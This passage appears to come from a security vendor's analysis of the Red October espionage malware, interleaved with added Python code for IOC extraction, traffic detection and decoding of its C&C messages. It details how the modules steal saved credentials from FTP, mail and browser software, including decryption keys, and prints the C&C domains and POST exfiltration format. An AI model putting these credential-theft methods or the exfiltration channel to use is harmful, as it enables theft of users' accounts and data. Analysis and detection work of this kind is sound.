where %u equals 6 and %s is the system time in the following format: "%04u%02u%02u_%02u%02u%02u_%03u"

If the FileTimeToSystemTime API fails, it uses the default time string: "16010101_000000_000"

If the wsprintfW API fails, it uses the default hardcoded filename: "@INFO\SYSINFO_X_00000000_000000_000.txt"

It also constructs the string "@INFO\AUTHINFO_%u_%s.bin” as a header for Buffer2, but the module is compiled in such a way that the retrieved data is not copied to Buffer2 and as a result is not sent to the CnC (that’s probably a developer’s mistake).

Buffer1 (.txt) is used to store general information text strings for logging purposes, and Buffer2 (.bin) is used to store information retrieved from registry values and file contents, including binary data.
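The scripts decoded from the AAA resource of the Wnhttp, Sysinfo and AuthInfo modules above all share the same SetOption/Call notation. The following Python, added here as an example and not part of the report or of any Kaspersky tooling, parses that notation as printed, replays each Call against the options set so far, and pulls out the hardcoded C&C hosts, URL paths and external-IP lookup targets as indicators. The bracketed length prefix is treated as the string length plus its NUL terminator (this matches every unredacted value on the page and flags the %removed% placeholders as inconsistent); that interpretation and the sample script are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the decoded resource scripts as printed in the
# report (the %removed% values are the report's own redactions).
SAMPLE_SCRIPT = '''
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(http_host, [7] "2ip.ru")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
Call(task_http)
SetOption(http_host, [12] "www.myip.ru")
SetOption(http_path, 0x002F)
Call(task_http)
Call(task_authinfo)
'''

SETOPTION_RE = re.compile(
    r'^SetOption\((?P<key>[\w.]+),\s*'
    r'(?:\[(?P<decl>\d+)\]\s*"(?P<text>.*)"|(?P<num>0x[0-9A-Fa-f]+))\)$')
CALL_RE = re.compile(r'^Call\((?P<task>\w+)\)$')


@dataclass
class Statement:
    kind: str                          # "set" or "call"
    key: str                           # option name or task name
    value: object = None               # str for string options, int for numeric ones
    declared_len: Optional[int] = None  # the [N] prefix; assumed to count the NUL terminator
    length_ok: bool = True             # False when len(text) + 1 != declared (e.g. redacted)


def parse_script(script: str) -> list:
    """Turn the printed SetOption/Call lines into Statement records."""
    stmts = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SETOPTION_RE.match(line)
        if m:
            if m.group("num") is not None:
                stmts.append(Statement("set", m.group("key"), int(m.group("num"), 16)))
            else:
                decl = int(m.group("decl"))
                text = m.group("text")
                stmts.append(Statement("set", m.group("key"), text, decl, len(text) + 1 == decl))
            continue
        m = CALL_RE.match(line)
        if m:
            stmts.append(Statement("call", m.group("task")))
            continue
        raise ValueError("unrecognised statement: " + line)
    return stmts


def extract_iocs(stmts) -> dict:
    """Replay the script: each Call(...) runs with the options set so far."""
    opts = {}
    iocs = {"c2_hosts": set(), "c2_paths": set(), "http_targets": [], "tasks": []}
    for s in stmts:
        if s.kind == "set":
            opts[s.key] = s.value
            continue
        iocs["tasks"].append(s.key)
        if s.key == "task_http":
            path = opts.get("http_path", "/")
            if isinstance(path, int):      # 0x002F is the ASCII code of "/"
                path = chr(path)
            iocs["http_targets"].append((opts.get("http_host"), opts.get("http_port"), path))
        # every task reports through the conn_a.* C&C settings in force at that point
        for k in ("conn_a.D_CONN", "conn_a.J_CONN"):
            if k in opts:
                iocs["c2_hosts"].update(opts[k].split(";"))
        for k in ("conn_a.D_NAME", "conn_a.J_NAME"):
            if k in opts:
                iocs["c2_paths"].add(opts[k])
    return iocs


def redacted_keys(stmts) -> list:
    """Options whose declared length does not fit the printed string."""
    return [s.key for s in stmts if s.kind == "set" and not s.length_ok]


if __name__ == "__main__":
    parsed = parse_script(SAMPLE_SCRIPT)
    print(extract_iocs(parsed))
    print("length mismatches:", redacted_keys(parsed))
```

The length check is a cheap sanity test when working from a printed or OCR'd script: any value whose bracketed length does not equal the string length plus one has been altered, redacted or mis-transcribed.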

Data collection

In all the functions, if a host is retrieved, it is also resolved to its IP.


1. Far Manager FTP data

Buffer1 sample data:

START

BEGIN : Far

FAR : regkey '%s' opened – OK

END : Far, size : %d

Extracts the following data from the registry for Buffer2:

HKCU\Software\Far2\Plugins\FTP\Hosts\Item\

“HostName“, “User“, “Password“ value data.

The “Password” value data is decrypted with the publicly known FAR FTP decryption algorithm, which is based on a simple XOR.

2. Winscp data

Buffer1 sample data:

BEGIN : Winscp

WINSCP : regvalue username found - OK

END : Winscp, size : %d

Enumerates the subkeys of the following key and retrieves the value data for Buffer2:

HKCU\Software\Martin Prikryl\WinSCP 2\Sessions\

Value names: “UserName”, "Password", "PortNumber", "FSProtocol", "HostName"

The “Password” value data is decrypted with the publicly known Winscp algorithm, which is based on bitwise operations and XOR using “UserName” concatenated with “HostName” as the key.

3. TotalCommander data

Buffer1 data sample:

BEGIN : TotalCommander

TOTAL COM : wcx_ftp.ini found – OK

END : TotalCommander, size : %d

Searches for the “wcx_ftp.ini” file, reads its contents and extracts the values of the parameters "username", "host" and "password".

The “password” value data is decrypted with the publicly known TotalCommander algorithm, which is based on XOR.

4. Internet Explorer 7 and 8 data

Buffer1 data sample:

BEGIN : IE78


IE78 : regkey opened – OK

END : IE78, size : %d

Enumerates the value names in the following key:

HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2\

The module creates a Microsoft URL History Service instance and enumerates URLs from the browser history. It calculates a URL hash using the CryptHashData API (SHA1 algorithm) and compares it with the value names from the previous registry key. If they coincide, the module retrieves the registry data for the corresponding hash and decrypts it using the CryptUnprotectData API. As a result, Autocomplete passwords and the corresponding URLs are obtained.

5. Internet Explorer 6 and Outlook data

Buffer1 data sample:

BEGIN : IE6, OutlookEx

OUTLOOK EXP : LoadLibrary: pstorec.dll: %u – ERROR

IE6 : pstore contains data - OK

Attempts to load the library “pstorec.dll”. If pstorec.dll couldn’t be loaded, it starts working with the registry immediately.

If the library is successfully loaded, it retrieves an interface pointer to a storage provider and enumerates provider types and subtypes. If the Resource Type corresponds to an IE Protected Site or an Outlook Account, it reads the data item name and the data item buffer. As a result it retrieves the IE HTTP/FTP basic authentication password and the corresponding hosts; for Outlook it retrieves POP3 passwords and proceeds with working with the registry. If the ResourceType corresponds to IE6, the module also interprets the ItemName as a URL and resolves the host to an IP.

In the case of Outlook, it enumerates the subkeys of the following key and retrieves the value data in them:

HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts\

Values: “POP3 Password2", "IMAP Password2", "HTTPMail Password2".

If one of the values coincides with a password previously retrieved from PStore, it retrieves the remaining values:

Account Name
SMTP Email Address
SMTP Server
HTTPMail User Name
HTTPMail Server
POP3 User Name
POP3 Server
IMAP User Name
IMAP Server

6. Opera, Chrome, Firefox, Thunderbird data

Buffer1 sample data:

BEGIN : Opera, GCH, MFF, THB


OPERA : wand.dat file found and read – OK

CHROME : Login Data file found and read – OK

THUNDERBIRD : signon file path '%s' found - OK

Opera: Reads the file %APPDATA%\Opera\Opera\wand.dat, decrypts it (3DES + proprietary), parses it and retrieves hosts and the corresponding passwords.

Chrome: In the Chrome processing function the module uses the SQLite library to read the file “%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data“ as a DB. It makes the query “SELECT * FROM logins” to retrieve hosts and saved passwords. It retrieves the "Password_value" field and decrypts it with a CryptUnprotectData API call.

Firefox: Reads the file %APPDATA%\Mozilla\Firefox\profiles.ini and retrieves “User Profiles Path” from it.

Queries the value in the following key to retrieve the Firefox path:

HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

In the Firefox directory it tries to load nss3.dll and plc4.dll and get the following functions: NSS_Init, NSS_Shutdown, PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword, PL_Base64Decode.

Sequentially tries to open and read the file %FirefoxProfilesPath%\signons.txt or signons2.txt or signons3.txt or sqlite.sqlite (these files are used in different Firefox versions). In the case of the *.txt files the module parses the file, retrieves URLs and decrypts usernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In the case of sqlite.sqlite it makes the query “SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins” and decrypts usernames and passwords using the PL_Base64Decode and PK11SDR_Decrypt functions.

Thunderbird: Reads the file %APPDATA%\Thunderbird\profiles.ini and retrieves “User Profiles Path” from it. Queries the value in the following key to retrieve the Thunderbird path:

HKLM\SOFTWARE\Clients\Mail\Mozilla Thunderbird\shell\open\command

In the Thunderbird directory it tries to load nss3.dll and plc4.dll and get the following functions: NSS_Init, NSS_Shutdown, PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword, PL_Base64Decode.

Sequentially tries to open and read the file %ThunderbirdProfilesPath%\signons.txt or signons2.txt or signons3.txt or sqlite.sqlite (these files are used in different Thunderbird versions). In the case of the *.txt files the module parses the file, retrieves URLs and decrypts usernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In the case of sqlite.sqlite it makes the query “SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins” and decrypts usernames and passwords using the PL_Base64Decode and PK11SDR_Decrypt functions.

7. The Bat data

Buffer1 data sample:

BEGIN : The Bat

THE BAT : Account.CFN '%s' read – OK

Searches for the “Account.CFN” file, decrypts it with an algorithm based on bitwise operations and a 1-byte XOR, then extracts hostnames, usernames and passwords.

8. Filezilla data


Buffer1 data sample:

BEGIN : FileZilla

FILE ZILLA : sitemanager.xml file found – OK

FILE ZILLA : sitemanager.xml '%s' opened - OK

Searches for the “sitemanager.xml” file, parses it and extracts the Host, User, Port and Pass values. No decryption routines are used in processing the file.

9. CoreFTP data

Buffer1 data sample:

BEGIN : CoreFtp

CORE FTP : regkey of core ftp '%s' opened – OK

CORE FTP : password is present - OK

Tries to open the following registry key, where %d is incremented starting from 0:

HKCU\Software\FTPWare\CoreFTP\Sites\%d

Retrieves the value data for: "Host", "Port", "User", "PW".

The “PW” data is decrypted using AES-128-ECB with a static key “hdfzpysvpzimorhk”.

10. IncrediMail data

Buffer1 sample data

BEGIN : IncrediMail

INCREDI : regkey Identities opened - OK

Enumerates the subkeys and retrieves the value data in them:

HKCU\Software\IncrediMail\Identities\%s\Accounts\%s

Value names: "PopPort", "Technology", "PopServer", "EmailAddress", "PopPassword".

The “PopPassword” data is decrypted using a proprietary algorithm based on simple XORing.

Network communication

The final Buffer (which contains only Buffer1 in the observed version; Buffer2 is not added) is compressed with Zlib, encrypted with a modified PKZIP stream cipher, and then Base64-encoded.

The module sequentially tries to send the data to the CnCs specified in the configuration resource, in a loop of 7 iterations until success. The interval between server communications is 3 seconds.

It forms the HTTP header of the following pattern:

POST http://%s:%s%s HTTP/1.0

Host: %s:%s


Pragma: no-cache

Cache-Control: no-cache

Content-length: %u

Content-Type: application/x-www-form-urlencoded

POSTDATA

The POST data is of the following structure:

Magic1 (4 bytes) + D_USER_Length (4 bytes) + Number1 (4 bytes) + Magic2 (4 bytes) + D_USER (as a string) + Magic3 (4 bytes) + Buffer

Magic1 equals 2.

Number1 is a 4-byte value calculated from the VolumeSerialNumber, the computer name and the “ProductID” key in HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration

Magic2 equals to 0.

Magic3 equals to 0xF1E1A003.

It always expects the server to return the “500” error code («Internal Server Error») to all the requests. If this error code is actually received then the function returns success, and no further actions are taken in the network function.

If the first sending-receiving routine returns failure, the module tries to find a proxy server and connect to it. The proxy server is found in the same way as in the “Browser history” module.
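The fixed-layout POST data just described (Magic1 = 2, D_USER_Length, Number1, Magic2 = 0, the D_USER string, Magic3 = 0xF1E1A003, then the Buffer) is distinctive enough to recognise in a packet capture. The Python below is an added example, not code from the report: it builds a body of that layout from constructed values and validates one back, returning the fields only when all three magics line up at the expected offsets. Little-endian 32-bit fields (the module is a Win32 DLL) and D_USER_Length being the byte length of the D_USER field are assumptions of the example; the report does not state either.

```python
import base64
import binascii
import struct

MAGIC1 = 2              # "Magic1 equals 2"
MAGIC2 = 0              # "Magic2 equals 0"
MAGIC3 = 0xF1E1A003     # "Magic3 equals 0xF1E1A003"
# Magic1, D_USER_Length, Number1, Magic2: four 32-bit fields, little-endian assumed
FIXED = struct.Struct("<IIII")


def build_post_data(d_user: bytes, number1: int, buffer: bytes) -> bytes:
    """Constructed sample builder. D_USER_Length is assumed to be the byte length of D_USER."""
    return (FIXED.pack(MAGIC1, len(d_user), number1 & 0xFFFFFFFF, MAGIC2)
            + d_user + struct.pack("<I", MAGIC3) + buffer)


def parse_post_data(data: bytes):
    """Return the fields when the layout and all three magics match, else None."""
    if len(data) < FIXED.size + 4:
        return None
    magic1, user_len, number1, magic2 = FIXED.unpack_from(data, 0)
    if magic1 != MAGIC1 or magic2 != MAGIC2:
        return None
    m3_off = FIXED.size + user_len          # Magic3 follows the D_USER string
    if m3_off + 4 > len(data):
        return None                         # truncated before Magic3
    (magic3,) = struct.unpack_from("<I", data, m3_off)
    if magic3 != MAGIC3:
        return None
    buffer = data[m3_off + 4:]
    try:
        base64.b64decode(buffer, validate=True)   # the report says Buffer is Base64-encoded
        buffer_is_base64 = len(buffer) > 0
    except binascii.Error:
        buffer_is_base64 = False
    return {
        "d_user": data[FIXED.size:m3_off],
        "number1": number1,
        "buffer": buffer,
        "buffer_is_base64": buffer_is_base64,
    }


def matches_authinfo_layout(data: bytes) -> bool:
    """Boolean form suitable for a capture-triage pass."""
    return parse_post_data(data) is not None


if __name__ == "__main__":
    sample = build_post_data(b"user01", 0x1234ABCD, b"QUJD")   # constructed values
    print(parse_post_data(sample))
```

Because Magic3 sits at an offset derived from D_USER_Length, a single fixed byte signature cannot cover the whole header; checking the three magics together, as above, avoids matching on the 4-byte value 2 alone, which is far too common at offset 0.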

Logic module

Known variants:

MD5 Size Compilation date (payload)

6da5d548828d113fe38f9f8406a5d697 163,840 bytes November 22, 2012

Summary

The Logic module is essentially used to quickly get general information about the current Windows machine and available remote network shares. The collected information is instantly sent to the Command&Control server; no local files are created.

This module is a Win32 DLL file. All functionality is in the DllMain function; no export names are defined. C runtime and utility library code is linked into the current module. The module was compiled with MS Visual C++ 2005.

Main

Calculates the machine id using one of the following methods:

1. Find the disk volume with the Windows system directory and use the volume serial number as the system id;
2. If the previous method fails, get the HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and the current computer name and hash them using a simple custom hashing algorithm (uses the two constants 0x3B21 and 0x1C55).

The module collects the following information about the current system:

1. Windows version
2. Computer name
3. User name
4. Local disk drives info:


Volume serial number
Filesystem name and flags
Free and used disk space

5. Windows and Temporary directory paths
6. Environment variables
7. Active and OEM codepages
8. Network adapter MAC address
9. Accessible network shares and remote computer IPs
10. List of local processes with all loaded modules

This information is later submitted to the C&C server.

List of processes and loaded modules collected by the malware

When submitting to the C&C server, it issues an HTTP POST request with the hardcoded string Subject: LOGIC and the appended data. It is capable of finding and using the local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using the rather old Zlib version 1.1.4, which was introduced in March 2002. For encryption it uses a modified version of the PKZIP cipher. For reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

The C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The module attempts to connect to the C&C server 5 times with a delay of 1 minute. If the server doesn’t respond it tries another one or gives up.
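Taken together, the sections above describe a recognisable network fingerprint: an HTTP/1.0 POST to /cgi-bin/nt/sk or /cgi-bin/nt/th on one of the three hardcoded nt-windows-*.com domains, answered with a 500 that the client treats as success, and retried at one-minute intervals by this module. The Python below, added as an example and not part of the report, applies those observations to a few constructed proxy log lines (a CLF-like layout assumed for the example): a hit on a known domain is scored high, the path/method/status pattern alone is scored medium, and clients repeating a flagged request at roughly the one-minute cadence are reported separately.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Optional

# Indicators taken from the report
C2_DOMAINS = {"nt-windows-online.com", "nt-windows-update.com", "nt-windows-check.com"}
C2_PATHS = {"/cgi-bin/nt/sk", "/cgi-bin/nt/th"}

# Constructed proxy log lines: client, timestamp, request line, status, bytes
SAMPLE_LOG = """\
10.0.0.5 [22/Nov/2012:10:00:00 +0000] "POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0" 500 0
10.0.0.5 [22/Nov/2012:10:01:00 +0000] "POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0" 500 0
10.0.0.5 [22/Nov/2012:10:02:00 +0000] "POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0" 500 0
10.0.0.7 [22/Nov/2012:10:02:30 +0000] "GET http://www.example.com/ HTTP/1.1" 200 5120
10.0.0.9 [22/Nov/2012:10:03:00 +0000] "POST http://203.0.113.10/cgi-bin/nt/th HTTP/1.0" 500 0
10.0.0.7 [22/Nov/2012:10:04:00 +0000] "POST http://www.example.com/api HTTP/1.1" 500 120
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<ver>HTTP/\d\.\d)" (?P<status>\d{3}) (?P<size>\d+)$')
URL_RE = re.compile(r'^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/[^ ]*)?$')


def classify(method: str, url: str, version: str, status: str) -> Optional[str]:
    """'high' for a known C&C domain, 'medium' for the request pattern alone, else None."""
    m = URL_RE.match(url)
    if not m:
        return None
    host = m.group("host").lower()
    path = m.group("path") or "/"
    if host in C2_DOMAINS:
        return "high"
    # the client sends HTTP/1.0 POSTs and treats a 500 as success, so a
    # "successful" beacon looks like a repeated server error in the log
    if path in C2_PATHS and method == "POST" and version == "HTTP/1.0" and status == "500":
        return "medium"
    return None


def scan_log(text: str) -> list:
    """Return (line_no, client, url, verdict, timestamp) for every flagged line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        verdict = classify(m["method"], m["url"], m["ver"], m["status"])
        if verdict:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            hits.append((n, m["client"], m["url"], verdict, ts))
    return hits


def retry_clients(hits, period: float = 60.0, tolerance: float = 5.0, min_hits: int = 3) -> set:
    """Clients that re-issue a flagged request at ~period-second intervals
    (the report: 5 attempts with a delay of 1 minute)."""
    by_key = defaultdict(list)
    for _, client, url, _, ts in hits:
        by_key[(client, url)].append(ts)
    result = set()
    for (client, _), times in by_key.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if all(abs(g - period) <= tolerance for g in gaps):
            result.add(client)
    return result


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h)
    print("retrying clients:", retry_clients(found))
```

The medium tier exists because the domains are the part of the infrastructure most easily replaced; the path, the HTTP/1.0 POST and the consistent 500 response are properties of the implant itself and survive a domain change.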

ILogic module

Known variants:

MD5 Size Compilation date (payload)


8a34088f776ff9c4857549b24eebcabb 151,552 bytes November 22, 2012

Summary

The ILogic module is essentially used to quickly grab the Internet Explorer URL history from the local system. The collected information is instantly sent to the Command&Control server.

This module is a Win32 DLL file. All functionality is in the DllMain function; no export names are defined. C runtime and utility library code is linked into the current module. The module was compiled with MS Visual C++ 2005.

Main

Calculates the machine id using one of the following methods:

1. Find the disk volume with the Windows system directory and use the volume serial number as the system id;
2. If the previous method fails, get the HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and the current computer name and hash them using a simple custom hashing algorithm (uses the two constants 0x3B21 and 0x1C55).

The module creates a COM object by the hardcoded CLSID=3C374a40-BAE4-11CF-BF7D-00AA006946EE, which stands for the Microsoft Url History Service. After that the module calls the object's methods to fetch the browsing history. This information is later submitted to the C&C server.

(Figure: data buffer created by the malware containing the URL history)

When submitting to the C&C server, it issues an HTTP POST request with the plaintext string Subject: ILogic followed by the appended data. It is capable of finding and using the local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It appears to use the rather old Zlib version 1.1.4, released in March 2002. For encryption it uses a modified version of the PKZIP cipher. For reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The module attempts to connect to the C&C server 5 times with a delay of 1 minute between attempts. If the server does not respond, it tries the next server from the list or gives up.


Repeat2 module
Known variants:

MD5 Size Compilation date (payload)

2be140e6abf23d6acc5fef0c11c07784 155,648 bytes November 22, 2012

Summary
The Repeat2 module is essentially used to quickly get listings from remote shares available in the Windows network neighborhood. The collected information is instantly sent to the Command&Control server. This module is a Win32 DLL file. All functionality is in the DllMain function; no export names are defined. C runtime and utility library code is linked into the module. The module was compiled with MS Visual C++ 2005.

Main
Calculates the machine id using one of the following methods:

1. Find the disk volume holding the Windows system directory and use its volume serial number as the system id;
2. If the previous method fails, get the HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and the current computer name and hash them using a simple custom hashing algorithm (uses two constants, 0x3B21 and 0x1C55).

The module uses the Windows API to locate available Windows shares and get directory listings from the remote computers. This information is later submitted to the C&C server.

(Figure: hardcoded value of the Subject field used in the data submission stage; userid is blurred)

When submitting to the C&C server, it issues an HTTP POST request with the hardcoded string Subject: REPEAT2 followed by the appended data. It is capable of finding and using the local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It appears to use the rather old Zlib version 1.1.4, released in March 2002. For encryption it uses a modified version of the PKZIP cipher. For reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk


The module attempts to connect to the C&C server 5 times with a delay of 1 minute between attempts. If the server does not respond, it tries the next server from the list or gives up.

Reference module
Known variants:

MD5 Size Compilation date (payload)

a2180b45002ee90ad0ec1f04ef90cb01 151,552 bytes November 22, 2012

Summary
The Reference module is essentially used to quickly grab directory/file listings of all drives attached to the local system (including network shares and USB drives). The collected information is instantly sent to the Command&Control server. This module is a Win32 DLL file. All functionality is in the DllMain function; no export names are defined. C runtime and utility library code is linked into the module. The module was compiled with MS Visual C++ 2005.

Main
Calculates the machine id using one of the following methods:

1. Find the disk volume holding the Windows system directory and use its volume serial number as the system id;
2. If the previous method fails, get the HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and the current computer name and hash them using a simple custom hashing algorithm (uses two constants, 0x3B21 and 0x1C55).

The module iterates through all attached drives and browses their contents. It collects directory listings including file names, last modification dates and sizes. This information is later submitted to the C&C server.

(Figure: data buffer created by the malware containing the file listing)

When submitting to the C&C server, it issues an HTTP POST request with the plaintext string Subject: REFERENCE followed by the appended data. It is capable of finding and using the local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It appears to use the rather old Zlib version 1.1.4, released in March 2002. For encryption it uses a modified version of the PKZIP cipher. For reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The module attempts to connect to the C&C server 5 times with a delay of 1 minute between attempts. If the server does not respond, it tries the next server from the list or gives up.
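The submission envelope shared by the Logic, ILogic, Repeat2 and Reference modules (zlib, then a PKZIP-derived stream cipher, then Base64, prefixed with the module's Subject string) can be modelled end to end. The following Python is an added example written for this page; it is not code from the report or from the malware. It implements the stock PKZIP traditional cipher with its constants exposed as parameters, then plugs in the five constants quoted above under an assumed placement (the first three as the initial key values, 0x343FD/0x269EC3 as the key1 LCG step). The password, the CRLF after the Subject line and the sample history buffer are also assumptions, so the block reproduces the structure of the POST body rather than the real keystream.

```python
import base64
import zlib

# Stock PKZIP "traditional encryption" constants. The text lists the values the Red October
# modules use instead (0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3); 0x343FD and
# 0x269EC3 are the MSVC rand() LCG multiplier/increment, so the working assumption below is
# that the first three replace the initial keys and the last two replace the key1 LCG step.
STOCK_KEYS = (0x12345678, 0x23456789, 0x34567890)
STOCK_MUL, STOCK_INC = 0x08088405, 1
ASSUMED_RO_KEYS = (0x12345679, 0x1E278E7A, 0x560397F7)   # placement is an assumption
ASSUMED_RO_MUL, ASSUMED_RO_INC = 0x343FD, 0x269EC3


def _crc_step(crc, byte):
    # one raw CRC-32 table step as PKZIP defines it (zlib's pre/post inversion undone)
    return zlib.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class PkzipCipher:
    """PKZIP stream cipher with the key-schedule constants exposed as parameters."""

    def __init__(self, password, keys=STOCK_KEYS, mul=STOCK_MUL, inc=STOCK_INC):
        self.k0, self.k1, self.k2 = keys
        self.mul, self.inc = mul, inc
        for b in password:
            self._update(b)

    def _update(self, b):
        self.k0 = _crc_step(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * self.mul + self.inc) & 0xFFFFFFFF
        self.k2 = _crc_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data):
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)  # the key state advances on the plaintext byte
        return bytes(out)

    def decrypt(self, data):
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def redoctober_cipher(password):
    # the modified variant, under the constant placement assumed above
    return PkzipCipher(password, ASSUMED_RO_KEYS, ASSUMED_RO_MUL, ASSUMED_RO_INC)


def build_post_body(subject, payload, password, cipher=redoctober_cipher):
    """Subject line + Base64(encrypt(zlib(payload))). The CRLF separator is an assumption."""
    blob = cipher(password).encrypt(zlib.compress(payload))
    return b"Subject: " + subject.encode() + b"\r\n" + base64.b64encode(blob)


def parse_post_body(body, password, cipher=redoctober_cipher):
    """Reverse of build_post_body: returns (subject, plaintext payload)."""
    header, _, encoded = body.partition(b"\r\n")
    subject = header.split(b": ", 1)[1].decode()
    plain = zlib.decompress(cipher(password).decrypt(base64.b64decode(encoded)))
    return subject, plain


# Constructed sample of what the ILogic module would submit: a few IE history URLs.
SAMPLE_HISTORY = b"\n".join([
    b"http://intranet.example/portal/login.aspx",
    b"https://mail.example/owa/",
    b"file:///C:/Users/user/Documents/report.docx",
])

if __name__ == "__main__":
    body = build_post_body("ILogic", SAMPLE_HISTORY, b"hypothetical-key")
    print(body[:60], b"...")
    print(parse_post_body(body, b"hypothetical-key"))
```

The useful property for an analyst is the parameterised key schedule: once the real initialisation and key are recovered from a sample, only redoctober_cipher needs changing, and parse_post_body then decodes captured POST bodies.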


“Red October”. Detailed Malware Description 3. Second Stage of Attack - Securelist
Source: http://www.securelist.com/en/analysis/204792264/Red_October_Detailed_Malware_Description_3_Second_Stage_of_Attack

“Red October”. Detailed Malware Description 3. Second Stage of Attack

First stage of attack
1. Exploits
2. Dropper
3. Loader Module
4. Main component

Second stage of attack
1. Modules, general overview
2. Recon group
3. Password group
4. Email group
5. USB drive group
6. Keyboard group
7. Persistence group
8. Spreading group
9. Mobile group
10. Exfiltration group

3. Password group

PswSuperMailRu module
Known variants:

MD5 Size Compilation date (payload)

7b669c32e6ee2c65bec5e09024fc5415 237,568 January 14th, 2011

b7327bfa4a101a21f0cc1b366aa8e107 237,568 March 29th, 2011

a39fa7340b2f1d7b42342b3e2f06df71 266,240 August 16th, 2010

cd170625655424149573c88c59716cc4 270,336 February 11, 2011

f60436b984962e741b81720ea604ad27 241,664 August 16th, 2010

2cf23cd8a7f85529576ba6c759f8cf37 270,336 March 29th, 2011

9bb32272be87a4dde8c8b05f49ded9f7 266,240 January 14th, 2011

ed72b6150e9fbc8f71e61dfea682a303 237,568 February 11th, 2011

The files are all PE exe files between 232 KB and 264 KB, compiled with Microsoft Visual Studio 2005. It is written in C/C++.

Entrypoint, unpacking stub, and obfuscation
The related binaries are heavily packed with a custom packer. The packer defeats basic software breakpoints and some API hooking techniques because it decrypts the original executable's section contents onto heap memory and then writes the decrypted code and the .data/.rdata contents back over the original sections, jumping back into the decrypted code and executing from there.

Summary
At its OEP, the module retrieves environment information and then creates a mutex with the string "SUPER MUTEX". The module then steals authentication credentials from the Mail.Ru Agent software and attempts to steal open and saved attachments from the Outlook Secure Temp Folder. The executable then fails in its attempt to write its own contents to another executable file in %temp% and maintain persistence on the system. Network functionality is absent from this module.

Credential Stealing
The module steals Mail.Ru Agent account credentials by reading the relevant registry values in order to extract the passwords or decrypt them, depending on the Agent version. The data is accessed at the following locations:

Registry key/value pair for Mail.Ru Agent version < 5.2
Registry key: HKCU\Software\Mail.Ru\Agent\magent_logins, binary value: ####password

Registry key/value pair for Mail.Ru Agent version 5.2 to 5.6
